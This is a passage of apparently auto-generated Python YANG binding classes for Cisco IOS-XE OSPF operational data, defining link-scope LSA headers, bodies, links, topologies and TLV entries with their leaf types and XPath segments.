OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) 
self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" 
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """

# Generated YANG binding metadata (module prefix / model revision).
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    # Declare the single 'network' child container and the four leafs of
    # the OSPFv2 LSA body, then freeze the instance so that all further
    # attribute writes are validated by __setattr__ below.
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()

    self.yang_name = "lsa-body"
    self.yang_parent_name = "ospfv2-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
    self._leafs = OrderedDict([
        ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
        ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
        ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
        ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
    ])
    self.num_of_links = None
    self.summary_mask = None
    self.external_mask = None
    self.body_flag_options = Bits()

    self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"
    self._segment_path = lambda: "lsa-body"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Restrict writes to the declared leaf names once the instance is frozen.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)


# NOTE(review): nested one level inside Ospfv2Lsa.LsaBody (see super() path);
# preserve the original nesting depth when merging.
class Network(Entity):
    """
    Network details (operational state, config false).

    * network_mask (str): IP network mask, IPv4 or IPv6 textual form.
    * attached_router (list of int, 0..4294967295): routers attached to
      the network.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
        ])
        self.network_mask = None
        self.attached_router = []
        self._segment_path = lambda: "network"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)


# NOTE(review): nested inside LinkScopeLsa (see super() path).
class Ospfv2Link(Entity):
    """
    OSPFv2 LSA link (keyed list entry; operational state, config false).

    * link_id (int, 0..4294967295): link ID (list key).
    * link_data (int, 0..4294967295): link data (list key).
    * type (int, 0..255): link type.
    * ospfv2_topology: list of Ospfv2Topology (per-topology metrics).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()

        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None

        self.ospfv2_topology = YList(self)
        # Both list keys appear in the XPath segment.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


    class Ospfv2Topology(Entity):
        """
        Topology specific information (config false).

        * mt_id (int, 0..4294967295): MT-ID for the topology enabled link
          (list key).
        * metric (int, 0..65535): metric for the topology.
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()

            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)


# NOTE(review): nested inside LinkScopeLsa; same shape as
# Ospfv2Link.Ospfv2Topology but parented directly under link-scope-lsa.
class Ospfv2Topology(Entity):
    """
    Summary LSA (config false).

    * mt_id (int, 0..4294967295): MT-ID for the topology enabled link
      (list key).
    * metric (int, 0..65535): metric for the topology.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()

        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)


class Ospfv2External(Entity):
    """
    External LSA (config false).

    * mt_id (int, 0..4294967295): MT-ID for the topology (list key).
    * metric (int, 0..4294967295): metric for the topology.
    * forwarding_address (str): forwarding address, IPv4 or IPv6 form.
    * external_route_tag (int, 0..4294967295): route tag.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()

        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)


class Ospfv2UnknownTlv(Entity):
    """
    OSPFv2 Unknown TLV (config false).

    * type (int, 0..65535): TLV type (list key).
    * length (int, 0..65535): TLV length.
    * value (list of int, 0..255): raw TLV value bytes.
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()

        self.yang_name = "ospfv2-unknown-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ])
        self.type = None
        self.length = None
        self.value = []
        self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)


class Ospfv3LsaVal(Entity):
    """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>` **config**\: False ..
attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>` **config**\: False """

# Generated YANG binding metadata (module prefix / model revision).
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    # Ospfv3LsaVal has no leafs of its own; it only aggregates the decoded
    # 'header' and 'lsa-body' child containers.
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()

    self.yang_name = "ospfv3-lsa-val"
    self.yang_parent_name = "link-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
    self._leafs = OrderedDict()

    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"

    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    self._segment_path = lambda: "ospfv3-lsa-val"
    self._is_frozen = True

def __setattr__(self, name, value):
    # No settable leafs; the empty list still enforces frozen-instance checks.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)


# NOTE(review): nested inside Ospfv3LsaVal (see super() path); preserve the
# original nesting depth when merging.
class Header(Entity):
    """
    Decoded OSPFv3 LSA header (config false).

    * lsa_id (str): LSA ID, IPv4 or IPv6 textual form.
    * lsa_header: common LSA header fields (LsaHeader).
    * lsa_hdr_options (Bits): OSPFv3 LSA options
      (Ospfv3LsaOptions bits).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()

        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa-val"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        self.lsa_id = None
        self.lsa_hdr_options = Bits()

        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


    class LsaHeader(Entity):
        """
        LSA header (config false).

        * age (int, 0..65535): LSA age.
        * type (int, 0..65535): LSA type.
        * adv_router (int, 0..4294967295): LSA advertising router.
        * seq_num (str): LSA sequence number.
        * checksum (str): LSA checksum.
        * length (int, 0..65535): LSA length.
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()

            self.yang_name = "lsa-header"
            self.yang_parent_name = "header"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ])
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self._segment_path = lambda: "lsa-header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)


# NOTE(review): nested inside Ospfv3LsaVal; its remaining child classes
# (Network .. IaPrefix) follow later in the file.
class LsaBody(Entity):
    """
    Decoded OSPFv3 LSA body (config false).

    Child containers: network, prefix (inter-area prefix), ia_router
    (inter-area router), lsa_external, nssa, link_data, ia_prefix
    (intra-area prefixes).

    * lsa_flag_options (Bits): LSA options (Ospfv3LsaOptions).
    * lsa_body_flags (Bits): LSA body flags (Ospfv3LsaBodyFlagOptions).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()

        self.yang_name = "lsa-body"
        self.yang_parent_name = "ospfv3-lsa-val"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
        self._leafs = OrderedDict([
            ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
            ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
        ])
        self.lsa_flag_options = Bits()
        self.lsa_body_flags = Bits()

        self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
        self.network.parent = self
        self._children_name_map["network"] = "network"

        self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"

        self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
        self.ia_router.parent = self
        self._children_name_map["ia_router"] = "ia-router"

        self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
        self.lsa_external.parent = self
        self._children_name_map["lsa_external"] = "lsa-external"

        self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
        self.nssa.parent = self
